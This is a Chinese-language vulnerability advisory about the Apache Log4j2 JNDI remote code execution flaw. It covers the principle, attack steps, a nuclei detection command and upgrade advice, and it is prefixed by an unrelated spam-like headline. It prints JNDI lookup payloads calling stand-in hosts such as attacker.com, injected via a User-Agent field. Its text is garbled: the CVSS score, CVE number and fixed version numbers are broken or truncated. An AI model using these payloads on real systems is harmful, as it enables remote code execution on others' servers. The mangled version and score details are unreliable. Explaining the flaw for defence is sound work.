核心内容摘要
婷婷五月,国货新生:解码国民风尚的魅力密码
CVSS评分
1
0满分CVE-
_ ApacheLog4j2远程代码执行漏洞
漏洞原理
漏洞危害
漏洞修复升级版本修复缓释方案
漏洞原理Apache Log4j2 作为广泛使用的 Java 日志库支持一种叫做Lookup查找替换的机制用于在日志消息中动态注入变量或外部内容。
例如${jndi:ldap://malicious-server/exploit}这是一个 JNDI Lookup 表达式它让 Log4j 去调用 Java Naming and Directory InterfaceJNDI 去解析某个 URL。
然而在受到漏洞影响的 Log4j 版本中JNDI 查找可以从 LDAP、RMI、DNS 等远程服务器获取并执行代码。
攻击 step攻击者构造 payload例如 HTTP User‑Agent 或其他可被日志记录的字段包含${jndi:ldap://attacker.com/malicious}。
目标应用接收请求Log4j 记录日志消息发现字符串中的 JNDI LookupJNDI 启动并向攻击者控制的服务器发起 LDAP其他协议也可以请求攻击者服务器返回一个恶意 Java 类恶意类被执行导致任意代码执行RCE检测方法需要机器有出网的权限nuclei -u http://xxx.xxx.xxx/ -t nuclei-templates/http/cves/2021/CVE-2021-
yaml
漏洞危害微步标记极度高危应立刻修复
漏洞修复升级版本修复官方已发布修复版本https://github.com/apache/logging-log4j2/releases/tag/log4j-
2.
1
0-rc2升级 Log4j 到修补版本升级到 Log4j
2.
1
0 或更高
2.
1
0可能不稳定更高版本如
2.
x已彻底禁用了可能的远程 JNDI Lookup。
缓释方案